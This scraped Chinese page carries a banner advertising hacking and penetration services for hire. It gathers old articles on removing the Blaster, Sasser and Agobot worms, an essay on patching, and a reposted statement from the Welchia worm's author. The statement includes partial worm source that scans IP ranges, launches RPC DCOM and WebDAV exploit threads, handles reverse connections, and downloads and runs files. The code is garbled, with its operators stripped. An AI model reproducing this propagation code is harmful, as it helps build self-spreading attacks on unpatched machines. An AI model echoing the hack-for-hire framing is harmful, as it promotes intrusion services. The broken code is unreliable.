黑客24小时在线接单网站

破解系统,专业黑客,黑客业务,渗透接单,黑客网站

冲击波杀手的黑客(冲击波病毒原理)

本文目录一览:

如何杀除冲击波

冲击波病毒感染症状

1、莫名其妙地死机或重新启动计算机;

2、IE浏览器不能正常地打开链接;

3、不能复制粘贴;

4、有时出现应用程序,比如Word异常;

5、网络变慢;

6、最重要的是,在任务管理器里有一个叫“msblast.exe”的进程在运行!

7.SVCHOST.EXE产生错误会被WINDOWS关闭,您需要重新启动程序

8、在WINNT\\SYSTEM32\\WINS\\下有DLLhost.exe和svchost.exe

检测你的计算机是否被"冲击波杀手"病毒感染:

1)检查系统的system32\\Wins目录下是否存在DLLHOST.EXE文件(大小为20K)和SVCHOST.EXE文件,(注意:系统目录里也有一个DLLHOST.EXE文件,但它是正常文件,大小只有8KB左右)如果存在这两个文件说明你的计算机已经感染了"冲击波杀手"病毒;

2) 在任务管理器中查看是否有三个或三个以上DLLHOST.EXE的进程,如果有此进程说明你的计算机已经感染了此病毒。

解决方法:

第一步:终止恶意程序

打开Windows任务管理器,按CTRL+ALT+DELETE然后单击进程选项卡 ,在运行的程序清单中*, 查找如下进程:MSBLAST.EXE DLLhost.exe和svchost.exe

选择恶意程序进程,然后按“终止任务”或是“中止进程”按钮。

为确认恶意程序进程是否中止,请关闭任务管理器并再次打开看进程是否已经终止。

第二步:删除注册表中的自启动项目

删除注册表中的自启动项目可以阻止恶意程序在系统启动时运行

注册表管理器 ,

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun

在右边的列表中查找并删除以下项目

Windows auto update" = MSBLAST.EXE DLLhost.exe和svchost.exe

重启系统

第三步:安装微软提供的冲击波补丁

Microsoft Security Bulletin MS03-026

点这里下载Win2000简体中文版冲击波补丁

点这里下载WinXP简体中文版冲击波补丁

点这里下载Win2000英文版冲击波补丁

点这里下载WinXP英文版冲击波补丁

装WIN2000系统的机器不论是服务器版还是个人版的都要顺序打上从SP2到Sp4

更改计算机系统时间到2004年后,重启计算机。这时病毒将自动清除自己,检查一下是否还有病毒;

瑞星专杀“冲击波”专杀工具

点击这里下载瑞星冲击波专杀工具1.9

点击这里下载金山毒霸冲击波专杀工具1.9

___________________________________________________________________

我怎么知道我是不是已经打上了这个补丁?

根据微软的定义,这个安全修补程序的代号为kb823980,我们要检查的就是这一项。

打开注册表编辑器。不知道怎么打开?在开始菜单上执行“运行”命令,输入“regedit"(不要引号)。

在注册表编辑器的窗口里又分左右两个窗格,我们先看左窗格。这个东西和资源管理器是非常相像的,只不过它有一些类似HKEY_。。。这样的条目,我们只看HKEY_LOCAL_MACHINE这一条(这里面的东东实在太多了,就不罗索了)。

展开这一条,找到里面的SOFTWARE,然后再展开,找到Microsoft,依次分别:

1、对于WindowsNT4.0: 找到 Updates,Windows NT, SP6,看看里面有没有kb823980

2、对于Windows2000: 找到 Updates,Windows 2000,SP5,看看里面有没有kb823980

3、对于WindowsXP: 找到 Updates,Windows XP, SP1,看看里面有没有kb823980 4、对于WindowsXP SP1:找到 Updates,Windows XP, SP2,看看里面有没有kb823980,如果找到,那就说明已经打上补丁了。如果没有,那就只有再来一次啦。

--------------------------------------------------------------------------------

-- 作者:白鲨笑江湖

-- 发布时间:2004-9-1 17:58:48

--

“震荡波”病毒

根据分析,“震荡波”病毒会在网络上自动搜索系统有漏洞的电脑,并直接引导这些电脑下载病毒文件并执行,因此整个传播和发作过程不需要人为干预。只要这些用户的电脑没有安装补丁程序并接入互联网,就有可能被感染。

“震荡波”病毒的发作特点,类似于去年夏天造成大规模电脑系统瘫痪的“冲击波”病毒,那就是造成电脑反复重启。

瑞星反病毒专家介绍,该病毒会通过ftp 的5554端口攻击电脑,使系统文件崩溃,造成电脑反复重启。病毒如果攻击成功,会在c:\\windows目录下产生名为avserve.exe的病毒体,用户可以通过查找该病毒文件来判断是否中毒。

“震荡波”病毒会随机扫描ip地址,对存在有漏洞的计算机进行攻击,并会打开ftp的5554端口,用来上传病毒文件,该病毒还会在注册表hkey_local_machine\\software\\microsoft\\windows\\currentversion\\run中建立:"avserve.exe"=%windows%\\avserve.exe的病毒键值进行自启动。

该病毒会使“安全认证子系统”进程━━lsass.exe崩溃,出现系统反复重启的现象,并且使跟安全认证有关的程序出现严重运行错误。

----------------------------------

主要症状:

1、出现系统错误对话框

被攻击的用户,如果病毒攻击失败,则用户的电脑会出现 LSA Shell 服务异常框,接着出现一分钟后重启计算机的“系统关机”框。

2、系统日志中出现相应记录

如果用户无法确定自己的电脑是否出现过上述的异常框或系统重启提示,还可以通过查看系统日志的办法确定是否中毒。方法是,运行事件查看器程序,查看其中系统日志,如果出现如下图所示的日志记录,则证明已经中毒。

3、系统资源被大量占用

病毒如果攻击成功,则会占用大量系统资源,使CPU占用率达到100%,出现电脑运行异常缓慢的现象。

4、内存中出现名为 avserve 的进程

病毒如果攻击成功,会在内存中产生名为 avserve.exe 的进程,用户可以用Ctrl+Shift+Esc 的方式调用“任务管理器”,然后查看是内存里是否存在上述病毒进程。

5、系统目录中出现名为 avserve.exe 的病毒文件

病毒如果攻击成功,会在系统安装目录(默认为 C:\\WINNT )下产生一个名为avserve.exe 的病毒文件。

6、注册表中出现病毒键值

病毒如果攻击成功,会在注册表的 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 项中建立病毒键值: "avserve.exe "="%WINDOWS%\\avserve.exe " 。

---------------------------------

如何防范“震荡波”

首先,用户必须迅速下载微软补丁程序,对于该病毒的防范,。

点这里下载微软补丁

金山或者瑞星用户迅速升级杀毒软件到最新版本,然后打开个人防火墙,将安全等级设置为中、高级,封堵病毒对该端口的攻击。

非金山或者瑞星用户迅速下载免费的专杀工具:

点这里下载

如果用户已经被该病毒感染,首先应该立刻断网,手工删除该病毒文件,然后上网下载补丁程序,并升级杀毒软件或者下载专杀工具。手工删除方法:查找该目录c:\\windows目录下产生名为avserve.exe的病毒文件,将其删除。

点这里下载2000补丁程序

点这里下载xp补丁程序

-------------------------

“震荡波”病毒解决其他:

A、请升级毒霸到5月1日的病毒库可完全处理该病毒;

B、请到以下网址即时升级您的操作系统,免受攻击

点这里下载

C、请打开个人防火墙屏蔽端口:5554和1068,防止名为avserve.exe的程序访问网络

D、如果已经中招,请下载专杀工具进行杀毒处理,点这里下载;或者采用手工方式解决:

对于系统是Windows9x/WinMe:

步骤一,删除病毒主程序

请使用干净的系统软盘引导系统到纯DOS模式,然后转到系统目录(默认的系统目录为 C:\\windows),分别输入以下命令,以便删除病毒程序:

C:\\windows\\system32\\del *_up.exe

C:\\windows\\system32\\cd..

C:\\windows\\del avserve.exe

完毕后,取出系统软盘,重新引导到Windows系统。

如果手中没有系统软件盘,可以在引导系统时按“F5”键也可进入纯DOS模式。

步骤二,清除病毒在注册表里添加的项

打开注册表编辑器: 点击开始运行, 输入REGEDIT, 按Enter;

在左边的面板中, 双击(按箭头顺序查找,找到后双击):

HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

在右边的面板中, 找到并删除如下项目:

"avserve.exe" = %SystemRoot%\\avserve.exe

关闭注册表编辑器.

对于系统是Windows NT, Windows 2000, Windows XP, Windows 2003 Sever:

步骤一,使用进程序管里器结束病毒进程

右键单击任务栏,弹出菜单,选择“任务管理器”,调出“Windows任务管理器”窗口。在任务管理器中,单击“进程”标签,在例表栏内找到病毒进程“avserve.exe”,单击“结束进程按钮”,点击“是”,结束病毒进程,然后关闭“Windows任务管理器”;

步骤二,查找并删除病毒程序

通过“我的电脑”或“资源管理器”进入系统安装目录(Winnt或windows),找到文件“avserve.exe”,将它删除;然后进入系统目录(Winnt\\system32或windows\\system32),找到文件"*_up.exe", 将它们删除;

步骤三,清除病毒在注册表里添加的项

打开注册表编辑器: 点击开始运行, 输入REGEDIT, 按Enter;

在左边的面板中, 双击(按箭头顺序查找,找到后双击):

HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

在右边的面板中, 找到并删除如下项目:

"avserve.exe" = %SystemRoot%\\avserve.exe

关闭注册表编辑器.

--------------------------------------------------------------------------------

-- 作者:白鲨笑江湖

-- 发布时间:2004-9-1 17:59:55

--

反病毒监测网国内率先截获了在网络中疯狂传播的“高波”病毒最新变种:“高波变种3T”(Worm.Agobot.3.T)。该蠕虫病毒不但利用了“冲击波”曾利用过的RPC漏洞,还使用了另外几个不为常知的漏洞,对局域网中的计算机进行多种攻击,破坏性要比“冲击波”病毒更为厉害。

据反病毒工程师介绍说,该病毒变种极多,目前已经有几十个病毒变种,但该变种是最厉害的一个,病毒运行时会扫描网络,对存在漏洞的计算机进行攻击,攻击成功后病毒还会利用大型密码字典来猜测计算机中密码,感染局域网,导致整个局域网络瘫痪。

据分析,该病毒发作时会对用户计算机带来以下影响:无法正常使用OFFICE软件,无法进行复制、粘贴,注册表无法使用,系统文件无法正常显示,CPU占用率达到100%、使用户计算机反应速度变慢。如果用户发现自己的计算机出现以上现象,则很有可能是中了该病毒,这时应该立刻断网、打补丁、杀毒,消除病毒造成的破坏。

病毒名称: Hack.Agobot3.aw

中文名称: 安哥[金山]

威胁级别: 3A

病毒别名:“高波变种3T”(Worm.Agobot.3.t) [瑞星]

Backdoor.Agobot.03.aw [AVP]

病毒类型: 黑客、蠕虫

受影响系统: WinNT/Win2K/WinXP/Win2003

该病毒兼具黑客和蠕虫的功能,利用IRC软件开启后门,等待黑客控制。使用RPC漏洞和WebDAV漏洞进行高速传播。猜测弱口令重点攻击局域网,造成局域网瘫痪。

金山毒霸已于11月27日进行了应急处理,并在当天升级了病毒库。升级到11月27日的病毒库可完全处理该病毒及其变种。

技术细节

1、利用利用RPC DCOM漏洞和WebDAV漏洞在网络中高速传播;

2、使用内部包含的超大型“密码表”猜口令的方式攻击局域网中的计算机,感染整个局域网,造成网络瘫痪;

3、系统修改:

A.将自身复制为%System%\\scvhost.exe.

B.在注册表的主键:

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

中添加如下键值:

"servicehost"="Scvhost.exe"

C.在注册表的主键:

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicces

中添加如下键值:

"servicehost"="Scvhost.exe"

4、中止许多知名反病毒软件和网络安全软件;

5、利用IRC软件开启后门;

6、试图偷取被感染计算机内的正版软件序列号等重要信息;

7、该病毒可造成计算机不稳定,出现计算机运行速度和网络传输速度极剧下降,复制、粘贴等系统功能不可用,OFFICE和IE浏览器软件异常等现象。

解决方案

A、升级杀毒软件或下载“安哥”专杀工具

点击这里下载瑞星高波专杀工具1.9

点击这里下载毒霸高波专杀工具

B、为系统打上MS03-026 RPC DCOM漏洞补丁(823980) 和MS03-007 WebDAV漏洞补丁(815021),并为系统管理员帐号设置一个更为强壮的密码。

MS03-026 RPC DCOM漏洞补丁(823980)下载地址

MS03-007 WebDAV漏洞补丁(815021)下载地址

C、手工清除

打开进程管理器,找到名为"scvhost.exe"的进程,并将其结束;在注册表中的项:HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

下删除如下键值:

"servicehost"="Scvhost.exe"

在注册表中的项:

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices

下删除如下键值:

"servicehost"="Scvhost.exe"

删除以下文件:

%System%\\scvhost.exe

专家提醒:

1、请及时升级您的杀毒软件到最新。因为病毒随时在产生,

2、打开网络和病毒防火墙,为您的系统打上微软的最新补丁。杀病毒不如防病毒,只要防止住病毒进入的通道,就可彻底免除病毒带来的危害;

3、不随意打开陌生人的邮件。当今的病毒不再只是通过计算机来传播,病毒制作者会利用人们好奇的心理来骗取自己激活的机会,

参考资料:

《冲击波杀手》那个黑客是谁?

这个问题警察也想知道 也没人在网上公布

给您转一篇文章 也许对您有用

冲击波杀手的作者网上现身

前言:“冲击波”蠕虫爆发后,大量个人主机及服务器遭受侵袭,各大安全公司,杀毒厂商纷纷推出各种解决方案,不料短短几日内,又出现了来历不明的新蠕虫,经过一些安全专家的反向编译和分析,惊讶的发现,该蠕虫的工作目标居然是消灭冲击波蠕虫并自动为受害主机进行补丁,而且该蠕虫还具有定时自毁功能,显然作者的目标还是有一定的善意因素,但是蠕虫毕竟是蠕虫,因为大量icmp包的发送,还是能够给企业局域网络带来极大的压力,就此,对蠕虫的危害性依然要保持极大的关注和警惕,相关文章可以参见

8月20日,蠕虫作者突然现身,出现在某安全论坛,以下是该作者论坛上声明的转载,并公开了源代码。

下文为作者自述-转自某安全论坛

玩过了~~ 虫虫四个小时之内已经完成了任务~~~ 不得不写这豆腐块~~~

char *szMe = "=========== I love my wife baby ~~~ Welcome Chian~~~

Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins";

偶:小地方小公司小小程序员

偶从不玩安全的,临时抱佛脚,看了些资料,仓促写了这个烂虫虫~~~

A 看不惯老外小鸟儿写的什么什么波的烂虫~~ ,虽然偶临时玩安全的即兴之作亦很烂

~~~

B 看不惯国内某几家放毒公司的商业炒作,发网难财,违背良心,误导民众

偶就帮你丫的除光了虫虫,打光了补丁,没想到他丫的误导的更变态~~~ 你丫的方脑壳

~~

C 帮偶不认识的 flashsky 兄解脱些吧~~~ 他丫的 Bill该死,快去谢flashsky~~~

D VirusBOy 兄,baby 可不是情人吆,偶家小子两岁就开始跟偶抢机器了~~

E 长了这么大,算首次报效社会吧~~~

F 几年?进去就是了,不就是个坐吗, 切~~~ 偶是吓大的!

======================================================

0 chian 系 china 笔误~~ 敲的快了,某个指头先到~~~

1 早在 8/13 国际国内骨干路由就丢弃了 135 syn ,只有加入WebDav才玩得转~~~

2 RpcDcom WebDav 使用同一 反向shellcode, 用 eyas的, lion修改

(声明:谁也没给偶,偶从一被人遗忘的公开程序中sniffer的,谢两位)

此shellcode 新进程建在svchost下,就一个Call Ebx 通杀了 all 2k xp

他丫的,还有放毒公司言导致xp机器重启云云的~~~

3 Bill该死 有 Tftpd.exe, 干吗不用,虽然偶看过 Tftp 协议,练习写过~~~

4 某年某月某日某时某刻,

溜出国门,辗转借了几台 Xeon™ 4 cpus, 2g memory 机器

架起 2000 线程的 WebDav 投放玩具,对准某国骨干的几个B段

10 分钟内投放了三四百个种子(早知道有这么多,就换个玩法 ~~~

5 发icmp包是为了提高搜索效率,算唯一的危害了~~~ 刺激一下也好~~~

打补丁的虫,杀虫的虫,再不有点儿小危害就丢尽了虫虫家族的脸~~~

//偶婆婆, 烂代码~~~ 将就看吧~~~

BOOL DoServicePackFunction()

{

DWORD nSystemVer = Win2000OrXp();

if ( !( nSystemVer == 0 || nSystemVer == 1) )

return FALSE; // not 2k or xp

if ( ReadRegServicePack(nSystemVer) )

return FALSE; //已经安装了

//识别语言版本

int nLanguageID;

unsigned int unOemCP = GetOEMCP();

LCID lcid = GetSystemDefaultLCID();

WORD wMain = PRIMARYLANGID(lcid);

WORD wSub = SUBLANGID(lcid);

if ( unOemCP == 437 wMain == 9 wSub == 1 ) //en

nLanguageID = 0; //打了你丫的en补丁就不错了~~ 还唧唧歪歪的~~

//管不了小欧洲~~ 俄罗斯牛人有自己的玩法

~~

else if ( unOemCP == 936 wMain == 4 wSub == 2 ) //cn

nLanguageID = 1; //就是为这个来的~~

else if ( unOemCP == 950 wMain == 4 wSub == 1 ) //tw

nLanguageID = 2; //同胞骨肉的忙,一定要帮~~

else if ( unOemCP == 932 wMain == 0x11 wSub == 1 ) //jp

nLanguageID = -1; //偶好有干掉鬼子机器的冲动!

//罢了,冤冤相报何时了~~~ 希望他丫的自新

~~~ 再玩火就灭了他丫的~~

else if ( unOemCP == 949 wMain == 0x12 wSub == 1 ) //kr

nLanguageID = 3; //少些不懂事的小鸟儿弯出去, 危害国内~~

else{

nLanguageID = -1;

}

if ( nLanguageID == -1)

return FALSE;

char szServicePack[] = "RpcServicePack.exe";

// downlaod it~~~

if ( !nSystemVer ) { // 2k

if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) )

return FALSE;

}

else{

if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) )

return FALSE;

}

char szExec[180];

sprintf(szExec, "%s -n -o -z -q", szServicePack);

HANDLE hProcess = MakeProcess( szExec );

if ( hProcess == NULL )

return FALSE;

if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ //六分钟内

未完成

TerminateProcess(hProcess,1);

CloseHandle(hProcess);

DeleteFile(szServicePack);

return FALSE;

}

CloseHandle(hProcess);

Sleep(15000);

DeleteFile(szServicePack);

if ( ReadRegServicePack(nSystemVer) ) {

ShutDownWindows( EWX_REBOOT | EWX_FORCE );//install service pack ok, reboot

it~~~

Sleep(20000); //说偶重启有过? 不重启补丁无效,

找 Bill该死 说去~~~

}

return TRUE;

}

// IN: 始ip, B段数量, 是否随机,是否换WebDav //更烂~~~ 凑合着看~~~

void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL

bWebDav)

{

HANDLE hThread = NULL;

BOOL bFirst = TRUE;

u_long uComp;

for (int i=0;i (nBCount * 256 * 256); i++){

if ( bRand )

uComp = MakeRandIp();

else

uComp = i + ulIpStart;

if ( //还是屏蔽掉部分目标,免得目标中招后,再玩就把下一代干掉了,不破坏的好

~~~

(BYTE)uComp == 0xc5 ||

(BYTE)(uComp8) == 0xc5 ||

(BYTE)(uComp16) == 0xc5 ||

(BYTE)(uComp24) == 0xc5 ||

(WORD)uComp == 0x9999 ||

(WORD)(uComp8) == 0x9999 ||

(WORD)(uComp16) == 0x9999 )

continue;

u_long *myPara = new u_long;

if ( myPara == NULL ){//如果分配失败,再尝试一次

Sleep(100);

myPara = new u_long;

}

if ( myPara ){

if ( hThread )

CloseHandle(hThread);

*myPara = htonl( uComp);

DWORD dwThreadId;

if (bWebDav)

hThread =

CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,dwThreadId);

else

hThread =

CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,dwThreadId);

Sleep(2);

}

//添加此处代码,避免首次执行时,线程中的

InterlockedIncrement(g_CurThreadCount) 未来得及运行,一次性建立了N个线程的

bug!

if ( bFirst (i = nMaxThread) ){

Sleep(2000);

bFirst = FALSE;

}

while(g_CurThreadCount = nMaxThread) // #define nMaxThread 300 ,不小心,

玩过了~~~

Sleep(2);

}

Sleep(60000);

}

//服务模式和控制台模式公用主程序

void DoIt()

{

WSADATAwsd;

if(WSAStartup(MAKEWORD(2,2),wsd)!=0)

return;

//杀蠕虫

KillMsblast();

//卸载

SYSTEMTIME st;

GetLocalTime(st);

if ( st.wYear == 2004 ){

MyDeleteService(szServiceName);

MyDeleteService(szServiceTftpd);

RemoveMe();

ExitProcess(1); //其实不必,RemoveMe()中借用了前辈的代码,2k下,退出程序时将

自身文件删除了

}

srand( GetTickCount() );

memset(pPingBuffer, '\xAA', sizeof(pPingBuffer));

//烦请骨干路由器立即丢弃此特征 Icmp Echo 包! 国内的什么什么波已经绝了!~~ 补

丁已经打够了!~~~

//准备WebDav发送缓冲区

do{

pWebDavExploitBuffer = new char[68000];

Sleep(100);

}while(pWebDavExploitBuffer == NULL);

//必须在checkonlien 之前,一次装配好子弹

PressWebDavBufferOnce();

PressRpcDcomBufferOnce();

CheckOnlienAndPressData(); //get LocalIp 修正子弹中的反向ip 和 端口

//打补丁

DoServicePackFunction();

//建立接收线程

DWORD dwThreadID;

HANDLE

hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L

PVOID)NULL,0,dwThreadID);

if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞,有反连,再建线程处理之,

同时处理多个反连

return;

CloseHandle(hWorkThread);

if ( !MyStartService(szServiceTftpd) ){

Sleep(1000);

InstallTftpService();

Sleep(1000);

MyStartService(szServiceTftpd);

}

Sleep(2000); //等待接收线程中的全局 rand bind port

u_long ulIP;

for(;{ //估算了一下,普通机器2小时一循环

//首先扫描本ip段

CheckOnlienAndPressData();

ulIP = ntohl(inet_addr(szLocalIp));

ulIP = 0xffff0000;

BeginExploitFunction( ulIP, 1, 0, 0);

//再扫描本ip前后3个段

CheckOnlienAndPressData();

if ( rand() % 2)

ulIP += 0x00010000;

else

ulIP -= 0x00030000;

BeginExploitFunction( ulIP, 3, 0, 0);

//再扫描WebDav一个段,跳出 135 syn封锁

CheckOnlienAndPressData();

ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); //请 wdIpHead[] B段IP商注意~~~,

立即采取补救措施~~~ sorry~~~

BeginExploitFunction( ulIP, 1, 0, 1);

//再扫描随机的IP, 数量1个 B段, rpc or webdav

CheckOnlienAndPressData();

if ( rand() % 2)

BeginExploitFunction( ulIP, 1, 1, 0);

else

BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~

KillMsblast();

}

//WSACleanup();

}

--------------------------------------------------------------------------------------------------

为方便阅读,增加几个补充说明

1.flashsky 创始人之一,启明星辰安全专家,擅长古体诗词,7月中公开rpc漏洞利用方式源代码,公开溢出分析报告,造成全球安全领域的震动,冲击波蠕虫的主要传播技术来源于这位高手公开的技术描述。

2.VirusBOy 懂点安全的小朋友,水平不咋地,不过你最好别招惹他,DDOS你一把也够受的。

3.某安全公司安全专家评论,该帖子内容基本属实,蠕虫源代码已经得到确认。

瑞星反病毒检测中心今晚再次截获利用微软RPC漏洞进行传播的病毒。不过,这个新病毒生来就是原冲击波病毒的克星。

瑞星反病毒工程师分析说:该病毒的特点是将“冲击波”(Worm.Blaster)病毒干掉,并在系统内值入,预防冲击波病毒的疫苗。

然后这个新病毒会尝试从微软网站下载补丁并自动将受感染的系统打上补丁。然后该病毒会开启数百个的线程PING其它IP地址,并通过RPC漏洞快速传播自己,消耗大量CPU和网络资源,并且有可能会导致系统死机。该病毒的作者似乎无意作恶,病毒设定在2004年自行毁灭。

由于该病毒采用PING方式进行探测,只感染能够PING通的机器,因此瑞星反病毒工程师提醒广大用户,设置防火墙的规则,禁止ping,这样可以有效防止该病毒的入侵。

计算机病毒,黑客的由来与他们之间的关系

病毒指的是不需要通过人操作,进行大批量的复制、修改、删除操作的代码。黑客指的是通过编写代码或者通过软件的漏洞进入公司系统或者个人系统中牟取利益的人。黑客可以通过病毒获利,病毒不一定是获利的,可以是一心搞破坏的~

冲击波攻击是什么 啊?

冲击波带来什么?

一种名为W32.Blaster.Worm的新蠕虫病毒这几天在互联网上十分肆虐,尤其在中国大陆,受感染的电脑越来越多,数千局域网因而此瘫痪,我常去的一些中小网站,有些已经无法打开了。

对于安全问题一直没有得到很好解决的互联网来说,病毒和黑客攻击向来是两个挥之不去的梦魇,使用极广泛的windows操作系统越做越庞大,存在漏洞是在所难免的。冲击波病毒和今年年初让中国大部分地区的互联网瘫痪数小时的SQL杀手病毒一样,都是利用了windows系统中的一个漏洞,对没有及时下载补丁的电脑发动攻击。

对比这两次影响比较大的病毒攻击事件,我们可以发现一个有趣的共同点,针对windows某一个漏洞的病毒出现之前,弥补这一漏洞的补丁早在几个月之前就被微软公布了。微软在全球各地拥有强大的软件测试群体,一般来说,其软件产品存在的漏洞,往往就是自己的测试人员首先发现的。当然,这也不奇怪,测试人员对微软产品的了解,比病毒的制造者高得多。所以,msblast的制造者并非早就知道windows系统中RPC的漏洞,他一定是破解了微软发布的补丁,然后分析补丁程序,得知此漏洞的具体位置,随即编写一个病毒软件,发到互联网上传播。

或者我们可以这样说,如果微软不发布补丁,就不会这么快的出现针对此漏洞的病毒。微软的补丁程序,也不会成为指引病毒制造者奋斗方向的航灯。

当然,这样的假设显然只是说笑而已,既然漏洞是客观存在的,微软自己不说出来,迟早也会有人发现,如果一个黑客攻击还没有来得及公布的漏洞,那么,造成的损失,会比冲击波大上好几倍。

在冲击波的攻击浪潮中,我们发现,和年初的SQL杀手攻击一样,大型网站依然表现出了坚如磐石的安全性能。其实,如果你使用的是正版的windows软件,如果你将自动update激活,那么每当微软公布一个漏洞补丁,连接在网上的电脑都会自动下载安装,几乎不需要更多的手动操作。即使因为某种原因,你无法安装补丁程序,稍具安全常识的用户都会在电脑中安装病毒防火墙,因为msblast最先发作的地区是美国,早在11日,比较知名的防毒软件制造商都推出了针对这种病毒的升级程序,只要及时的升级了病毒库,国内的电脑用户也可以有效的避免受到冲击波的感染。

SQL杀手将年初的国内互联网搅了个一团糟,然而,大部分用户都没有从这一次的攻击中汲取足够的教训,于是有了在一个地方反反复复跌倒的怪事。冲击波病毒冲击中国大陆的时候,居然还有90%的用户没有下载几个月之前就已经公布的RPC补丁,等到大难临头的时候,又蜂拥而上,结果反而造成windows update线路拥挤,极难连接。如此漠然的安全意识,难道是傻瓜都可以操作的windows系统带来的必然结果?

微软不得不在公布系统漏洞和让所有的黑客知道这个漏洞之间做出选择,最近的病毒攻击结果证明:只要密切保持与windows update联系的用户,都不会受到利用windows系统漏洞进行攻击的病毒的影响。所以,该检讨的,不是微软产品的安全性,而是使用这些产品的人的头脑中的安全意识。

软件的安全性是一个渐进的过程,当今主流的操作系统没有一个敢保证自己绝对是安全的,至于应用软件,漏洞更是比比皆是。越是使用广泛的软件版本,越会成为黑客和病毒制造者研究的对象,当然,从另外一方面说,黑客和病毒攻击恰恰可以使软件的安全性逐步提高。一些应用范围不太广泛的软件,因为不受重视,其安全漏洞看似比一些主流系统低,实际上它的一些重大的漏洞,会长时间隐藏在使用者的电脑里不为人所知,而一旦这样的漏洞被不怀好意者发现,就会招致灾难性的后果。

网上有些朋友戏称冲击波病毒是比尔雇人做的,理由如下:第一,此病毒并不会破坏电脑中的数据和硬件,只是造成网络连接中断,并且其表征十分明显,病毒代码可以轻易的以手工删除。第二,病毒的出现,远远在微软公布RPC补丁之后。至于比尔为什么要这样做?富于想象者认为有如下三个原因:一,可以以一种比较温和的,却又让你难忘的方式给所有安全意识淡薄的windows用户一个教训,提高update在微软产品使用者心中的地位。二,可以在某种程度上有效的打击盗版。盗版windows软件的使用者,无法安装微软的补丁,因为补丁是要激活的,就算有破解能力的用户,也需要一定时间才能破解激活,不可能及时的更新自己的系统。三,既然微软已经承认了存在这样一个漏洞,黑客迟早会利用它,与其让人家利用它来造成无法预期的后果,还不如自己先做一个有限度的攻击,促使绝大部分用户将此漏洞补上,从而彻底的断绝真正的黑客的非分之想。如此一箭三雕之计,只有比尔这样的高智商者才能想的出来。

互联网存在一天,病毒和黑客就不会消失,这和高速公路永远不可能和车祸脱开干系是一个道理。既然上网就必须冒被攻击的风险,那么热衷于网上冲浪的朋友们为什么不尽力提高自己的电脑技能呢?电脑不是游戏机,不是电视,它是一个有灵性的,具有相当的操控性的智能机器。一个技术娴熟的司机开车外出,显然比毛毛糙糙的初学者有更多的安全保障。电脑也是如此,真正能保护你的,是你对它的了解程度和操控能力。

  • 评论列表:
  •  黑客技术
     发布于 2022-07-18 17:39:15  回复该评论
  • T”(Worm.Agobot.3.t) [瑞星] Backdoor.Agobot.03.aw [AVP] 病毒类型: 黑客、蠕虫 受影响系统: WinNT/Win2K/WinXP/Win2003 该病毒兼具黑客和蠕虫的功能,利用IRC软件开启后门,等待黑客控制。使用RPC漏洞和WebDAV漏洞进行
  •  黑客技术
     发布于 2022-07-19 00:03:38  回复该评论
  • 导系统时按“F5”键也可进入纯DOS模式。 步骤二,清除病毒在注册表里添加的项 打开注册表编辑器: 点击开始运行, 输入REGEDIT, 按Enter; 在左边的面板中, 双击(按箭头顺序查找,找到后双击): HKEY_CURRENT_USER\

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.